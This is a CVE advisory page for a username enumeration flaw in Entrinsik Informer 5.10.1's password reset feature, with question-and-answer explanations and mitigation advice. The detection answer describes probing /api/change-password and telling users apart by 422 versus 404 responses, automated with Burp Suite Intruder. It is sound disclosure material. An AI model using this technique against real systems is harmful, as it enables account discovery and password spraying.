CVE-2025-65185
Username Enumeration via OTP in Entrinsik Informer v
Publication date: 2025-12-17
Last updated on: 2025-12-17
Assigner: MITRE
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| entrinsik | informer | 5.10.1 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-203 | The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-65185 is a username enumeration vulnerability in Entrinsik Informer version 5.10.1. It occurs in the 'Forgot Password' functionality, where an attacker can enter a username and observe different application responses depending on whether the username exists. For valid usernames, the application returns a 422 error indicating an incorrect code, while for invalid usernames, it returns a 404 error stating the user was not found. This discrepancy allows attackers to automate the discovery of valid usernames by analyzing these responses. [2]
How can this vulnerability impact me? :
This vulnerability allows attackers to identify valid usernames within the Entrinsik Informer application. Knowing valid usernames facilitates more targeted attacks such as password spraying and helps attackers map user roles within the environment, increasing the risk of unauthorized access and potential compromise of sensitive information. [2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by sending POST requests to the /api/change-password endpoint with various usernames and analyzing the application's responses. For valid usernames, the response is a 422 Unprocessable Entity error indicating an incorrect code, while for invalid usernames, the response is a 404 Not Found error stating the user was not found. Tools like Burp Suite's intruder can automate this process to enumerate usernames based on these differing responses. [2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include standardizing the application's responses so they do not reveal whether a username is valid. For example, always respond with a generic message such as 'An email has been sent with password reset instructions. If you do not receive an email within 5 minutes, please try again,' regardless of username validity. Additionally, login error messages should be generic like 'Invalid credentials,' and timing and response size differences should be minimized to prevent side-channel username enumeration. [2]